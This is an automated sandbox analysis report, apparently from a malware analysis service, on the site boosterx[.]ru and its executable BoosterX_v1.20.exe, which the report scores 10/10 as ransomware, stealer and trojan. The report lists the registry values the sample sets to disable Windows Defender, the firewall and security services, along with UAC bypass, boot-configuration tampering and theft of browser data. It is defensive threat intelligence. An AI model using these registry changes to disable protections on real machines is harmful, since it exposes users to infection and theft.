hxxps://boosterx[.]ru

Analysis

max time kernel
279s
max time network
1025s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
21-05-2022 15:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://boosterx.ru

Score

10^/10

evasion persistence ransomware spyware stealer trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089

Modifies firewall policy service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	reg.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	reg.exe

Modifies security service 2 TTPs 7 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exereg.execmd.exereg.exereg.exereg.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\mpssvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	cmd.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Start = "4"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4"	reg.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 10 IoCs

Processes:

svchost.exe

description	pid	process	target process
PID 1108 created 2148	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 2148	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 2148	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 2148	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 2148	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 2116	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 2428	1108	svchost.exe	Conhost.exe
PID 1108 created 4648	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 4768	1108	svchost.exe	BoosterX_v1.20.exe
PID 1108 created 3764	1108	svchost.exe	BoosterX_v1.20.exe

UAC bypass 3 TTPs
evasion trojan

Bypass User Account Control
T1088

Disabling Security Tools
T1089

Modify Registry
T1112
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

692 bcdedit.exe
4632 bcdedit.exe
Modifies Installed Components in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Processes:

explorer.exe

description ioc process

File opened (read-only) \??\D: explorer.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

163 ipapi.co

pid	process
692	bcdedit.exe
4632	bcdedit.exe

description	ioc	process
File opened (read-only)	\??\D:	explorer.exe

flow	ioc
163	ipapi.co

Drops file in System32 directory 1 IoCs

Processes:

BoosterX_v1.20.exe

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\BoosterX_v1.20.exe.log	BoosterX_v1.20.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 13 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

BoosterX_v1.20.exetaskmgr.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags	BoosterX_v1.20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	BoosterX_v1.20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc	BoosterX_v1.20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID	BoosterX_v1.20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags	BoosterX_v1.20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	BoosterX_v1.20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID	BoosterX_v1.20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	BoosterX_v1.20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc	BoosterX_v1.20.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	BoosterX_v1.20.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

3180 taskkill.exe
3432 taskkill.exe
2464 taskkill.exe

pid	process
3180	taskkill.exe
3432	taskkill.exe
2464	taskkill.exe

Modifies data under HKEY_USERS 25 IoCs

Processes:

BoosterX_v1.20.exeBoosterX_v1.20.exereg.execmd.exereg.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	BoosterX_v1.20.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	cmd.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	cmd.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	reg.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	BoosterX_v1.20.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	BoosterX_v1.20.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	reg.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	cmd.exe

Modifies registry class 21 IoCs

Processes:

reg.exereg.exereg.exeexplorer.exereg.exechrome.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\FriendlyTypeName = "Power Plan"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import	reg.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1809750270-3141839489-3074374771-1000\{E50D0B86-5C91-40A0-9038-568ABD0E75D1}	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\DefaultIcon	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\DefaultIcon\ = "%C:\\Windows%\\System32\\powercfg.cpl,-202"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import\command\ = "powercfg /import \"%1\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	explorer.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	explorer.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\ = "Power Plan"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow\shell\Import\command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.pow	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1809750270-3141839489-3074374771-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	explorer.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exechrome.exechrome.exechrome.exechrome.exeBoosterX_v1.20.exechrome.exechrome.exeBoosterX_v1.20.exeConhost.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exechrome.exetaskmgr.exechrome.exe

pid	process
1816	chrome.exe
1816	chrome.exe
1732	chrome.exe
1732	chrome.exe
1784	chrome.exe
1784	chrome.exe
4728	chrome.exe
4728	chrome.exe
3088	chrome.exe
3088	chrome.exe
2148	BoosterX_v1.20.exe
2148	BoosterX_v1.20.exe
2720	chrome.exe
2720	chrome.exe
800	chrome.exe
800	chrome.exe
2148	BoosterX_v1.20.exe
2148	BoosterX_v1.20.exe
2148	BoosterX_v1.20.exe
2148	BoosterX_v1.20.exe
2148	BoosterX_v1.20.exe
2116	BoosterX_v1.20.exe
2116	BoosterX_v1.20.exe
2428	Conhost.exe
2428	Conhost.exe
4648	BoosterX_v1.20.exe
4648	BoosterX_v1.20.exe
4768	BoosterX_v1.20.exe
4768	BoosterX_v1.20.exe
3764	BoosterX_v1.20.exe
3764	BoosterX_v1.20.exe
4728	chrome.exe
4728	chrome.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
2340	chrome.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

Processes:

BoosterX_v1.20.exetaskmgr.exe

pid process

2148 BoosterX_v1.20.exe
960 taskmgr.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs

Processes:

chrome.exe

pid process

1732 chrome.exe
1732 chrome.exe
1732 chrome.exe

pid	process
2148	BoosterX_v1.20.exe
960	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

BoosterX_v1.20.exesvchost.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exeConhost.exeBoosterX_v1.20.exeBoosterX_v1.20.exeBoosterX_v1.20.exereg.execmd.exetaskkill.exetaskkill.exetaskmgr.exepowercfg.exepowercfg.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskkill.exeexplorer.exe

description	pid	process
Token: SeDebugPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2148	BoosterX_v1.20.exe
Token: SeTcbPrivilege	1108	svchost.exe
Token: SeTcbPrivilege	1108	svchost.exe
Token: SeDebugPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2428	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2116	BoosterX_v1.20.exe
Token: SeDebugPrivilege	4768	BoosterX_v1.20.exe
Token: SeDebugPrivilege	4648	BoosterX_v1.20.exe
Token: SeDebugPrivilege	3764	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2116	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2428	Conhost.exe
Token: SeDebugPrivilege	4648	BoosterX_v1.20.exe
Token: SeDebugPrivilege	4768	BoosterX_v1.20.exe
Token: SeDebugPrivilege	3764	BoosterX_v1.20.exe
Token: SeDebugPrivilege	5024	BoosterX_v1.20.exe
Token: SeDebugPrivilege	1888	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2260	BoosterX_v1.20.exe
Token: SeDebugPrivilege	5112	reg.exe
Token: SeDebugPrivilege	432	cmd.exe
Token: SeDebugPrivilege	3180	taskkill.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	3432	taskkill.exe
Token: SeDebugPrivilege	960	taskmgr.exe
Token: SeSystemProfilePrivilege	960	taskmgr.exe
Token: SeCreateGlobalPrivilege	960	taskmgr.exe
Token: SeShutdownPrivilege	2236	powercfg.exe
Token: SeCreatePagefilePrivilege	2236	powercfg.exe
Token: SeShutdownPrivilege	3376	powercfg.exe
Token: SeCreatePagefilePrivilege	3376	powercfg.exe
Token: SeDebugPrivilege	2228	powershell.exe
Token: SeDebugPrivilege	1944	powershell.exe
Token: SeDebugPrivilege	4196	powershell.exe
Token: SeDebugPrivilege	1400	powershell.exe
Token: SeDebugPrivilege	4736	powershell.exe
Token: SeDebugPrivilege	2240	powershell.exe
Token: SeDebugPrivilege	4468	powershell.exe
Token: SeDebugPrivilege	2168	powershell.exe
Token: SeDebugPrivilege	3104	powershell.exe
Token: SeDebugPrivilege	4580	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	4488	powershell.exe
Token: SeDebugPrivilege	2396	powershell.exe
Token: SeDebugPrivilege	4800	powershell.exe
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	3840	powershell.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeLoadDriverPrivilege	2148	BoosterX_v1.20.exe
Token: SeDebugPrivilege	2464	taskkill.exe
Token: SeShutdownPrivilege	2376	explorer.exe
Token: SeCreatePagefilePrivilege	2376	explorer.exe
Token: SeShutdownPrivilege	2376	explorer.exe
Token: SeCreatePagefilePrivilege	2376	explorer.exe
Token: SeShutdownPrivilege	2376	explorer.exe
Token: SeCreatePagefilePrivilege	2376	explorer.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exeBoosterX_v1.20.exetaskmgr.exe

pid	process
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
2148	BoosterX_v1.20.exe
2148	BoosterX_v1.20.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
1732	chrome.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe
960	taskmgr.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 1732 wrote to memory of 776	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 776	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1660	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1816	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1816	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe
PID 1732 wrote to memory of 1488	1732	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://boosterx.ru
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1732

